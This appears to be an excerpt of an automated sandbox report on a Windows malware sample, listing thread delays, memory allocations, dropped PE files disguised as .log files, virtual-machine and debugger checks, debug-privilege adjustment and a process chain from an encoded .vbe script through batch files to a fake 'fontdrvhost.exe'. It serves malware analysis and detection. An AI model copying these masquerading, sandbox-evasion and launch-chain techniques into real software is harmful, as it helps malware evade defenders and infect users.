Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Memory allocated: 1040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Memory allocated: 1AA90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Memory allocated: 1890000 memory reserve \| memory write watch
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Memory allocated: 1B4B0000 memory reserve \| memory write watch
Source: C:\Drivers\fontdrvhost.exe	Memory allocated: 24B0000 memory reserve \| memory write watch
Source: C:\Drivers\fontdrvhost.exe	Memory allocated: 1A730000 memory reserve \| memory write watch
Source: C:\Drivers\fontdrvhost.exe	Memory allocated: AD0000 memory reserve \| memory write watch
Source: C:\Drivers\fontdrvhost.exe	Memory allocated: 1A460000 memory reserve \| memory write watch
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Memory allocated: 1060000 memory reserve \| memory write watch
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Memory allocated: 1A970000 memory reserve \| memory write watch

Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599545	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599323	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599085	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598893	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597038	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596930	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 600000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599862
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599469
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 3600000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598891
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598750
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598625
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598485
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598374
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598203
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598047
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597844
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597703
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597591
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597328
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597184
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597062
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596953
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596828
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596719
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596609
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596494
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596354
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596250
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596141
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 300000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596016
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595906
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595797
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595688
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595578
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595458
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595343
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595234
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595120
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 594985
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 594860
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 594719
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Drivers\fontdrvhost.exe	Window / User API: threadDelayed 574	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Window / User API: threadDelayed 4171	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Window / User API: threadDelayed 4743
Source: C:\Drivers\fontdrvhost.exe	Window / User API: threadDelayed 4888

Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sRuyTvnC.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LRGWtOLy.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BimGJlFQ.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MihenAyR.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tWFZTedC.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jqKBOCJa.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RKjvWuQm.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bsCLGWVU.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aFStzZSn.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\knlJjCXV.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CANODYsk.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\szTqaJAi.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jWKBqQkB.log	Jump to dropped file
Source: C:\Drivers\fontdrvhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iIcaGucE.log	Jump to dropped file

Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -599653s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -599545s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -599435s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -599323s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -599085s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -598893s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -99844s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -99719s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -99610s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -99235s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -99092s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -98761s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -98641s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -98407s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -98282s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -597038s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6812	Thread sleep time: -596930s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6020	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe TID: 6276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe TID: 7148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe TID: 1308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 280	Thread sleep time: -30000s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -600000s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -599862s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -599469s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7372	Thread sleep time: -14400000s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -598891s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -598750s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -598625s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -598485s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -598374s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -598203s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -598047s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -597844s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -597703s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -597591s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -597328s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -597184s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -597062s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596953s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596828s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596719s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596609s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596494s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596354s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596250s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596141s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7372	Thread sleep time: -600000s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -596016s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595906s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595797s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595688s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595578s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595458s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595343s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595234s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -595120s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -594985s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -594860s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -594719s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -100000s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -99890s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -99757s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -99655s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -99329s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -99193s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -98937s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -98794s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -98670s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -98559s >= -30000s
Source: C:\Drivers\fontdrvhost.exe TID: 7388	Thread sleep time: -98450s >= -30000s
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe TID: 7792	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Drivers\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Drivers\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Drivers\fontdrvhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00FAA69B
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00FBC220

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FBE6A3 VirtualQuery,GetSystemInfo,

0_2_00FBE6A3

Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599545	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599323	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599085	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598893	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99844	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99719	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99610	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99235	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99092	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98761	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98641	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98407	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98282	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597038	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596930	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 30000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 600000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599862
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 599469
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 3600000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598891
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598750
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598625
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598485
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598374
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598203
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 598047
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597844
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597703
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597591
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597328
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597184
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 597062
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596953
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596828
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596719
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596609
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596494
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596354
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596250
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596141
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 300000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 596016
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595906
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595797
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595688
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595578
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595458
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595343
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595234
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 595120
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 594985
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 594860
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 594719
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 100000
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99890
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99757
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99655
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99329
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 99193
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98937
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98794
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98670
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98559
Source: C:\Drivers\fontdrvhost.exe	Thread delayed: delay time: 98450
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Thread delayed: delay time: 922337203685477

Source: wscript.exe, 00000001.00000002.1672953073.00000000029AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Sl
Source: fontdrvhost.exe, 00000004.00000002.1762220412.000000001C1A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: fontdrvhost.exe, 0000001A.00000002.2922468166.000000001AEE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: wscript.exe, 00000001.00000002.1672953073.00000000029AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: fontdrvhost.exe, 00000004.00000002.1764575398.000000001C9E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\`
Source: fontdrvhost.exe, 00000004.00000002.1763422195.000000001C241000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

API call chain: ExitProcess graph end node

graph_0-24894

Source: C:\Drivers\fontdrvhost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FBF838

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FC7DEE mov eax, dword ptr fs:[00000030h]

0_2_00FC7DEE

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe

Code function: 0_2_00FCC030 GetProcessHeap,

0_2_00FCC030

Source: C:\Drivers\fontdrvhost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process token adjusted: Debug
Source: C:\Drivers\fontdrvhost.exe	Process token adjusted: Debug
Source: C:\Drivers\fontdrvhost.exe	Process token adjusted: Debug
Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FBF838
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FBF9D5 SetUnhandledExceptionFilter,	0_2_00FBF9D5
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FBFBCA
Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Code function: 0_2_00FC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FC8EBD

Source: C:\Drivers\fontdrvhost.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\YGk3y6Tdix.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"	Jump to behavior
Source: C:\Drivers\fontdrvhost.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
